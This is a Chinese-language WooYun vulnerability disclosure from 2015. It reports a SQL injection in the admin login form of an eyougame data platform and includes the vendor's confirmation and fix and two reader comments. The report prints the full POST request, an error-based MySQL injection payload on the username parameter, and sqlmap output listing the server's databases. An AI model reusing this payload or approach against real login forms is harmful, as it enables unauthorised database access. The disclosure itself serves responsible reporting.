当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117951

漏洞标题:eyougame某处SQL注入

相关厂商:eyougame.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-03 14:23

修复时间:2015-06-04 07:55

公开时间:2015-06-04 07:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-04: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

没错 我又来提交漏洞了
本次为后台POST 注入 由于参数 username 未过滤 所以导致了本次注入 下面为本次测试的详细内容
在后台管理处 加了个单引号

0.png


00.png


报错了 直接抓包将数据丢进 sqlmap 里
POST数据包:

POST /index.php/Home/Login/checkLogin HTTP/1.1
Host: data.eyougame.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://data.eyougame.com/index.php/Home/Login/index.html
Cookie: PHPSESSID=uflapr577fd4tts80i0it6ta41
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
username=admin&password=admin


1.png


POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requ
ests:
---
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: username=admin') AND (SELECT 8106 FROM(SELECT COUNT(*),CONCAT(0x717
6626b71,(SELECT (ELT(8106=8106,1))),0x71627a7071,FLOOR(RAND(0)*2))x FROM INFORMA
TION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('hrYO'='hrYO&password=admin
---
[13:17:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[13:17:44] [INFO] fetching database names
[13:17:45] [INFO] the SQL query used returns 5 entries
[13:17:45] [INFO] retrieved: information_schema
[13:17:45] [INFO] retrieved: datacenter
[13:17:45] [INFO] retrieved: mysql
[13:17:45] [INFO] retrieved: performance_schema
[13:17:46] [INFO] retrieved: systemlog
available databases [5]:
[*] datacenter
[*] information_schema
[*] mysql
[*] performance_schema
[*] systemlog


2.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-04 07:54

厂商回复:

的确存在变量过滤不严的问题,感谢您对我们的漏洞反馈.这是之前搭建的一个临时数据平台,所以可能存在很多没有留意的问题.再次感谢!

最新状态:

2015-06-04:已经处理相关代码,再次感谢乌云平台以及提交漏洞的朋友.


漏洞评价:

评论

  1. 2015-06-04 22:02 | 践行☆路上 ( 路人 | Rank:2 漏洞数:1 | 一切伟大的开始都基于最简单的事!)

    不错啊

  2. 2015-06-06 16:03 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    post注入 怎么弄啊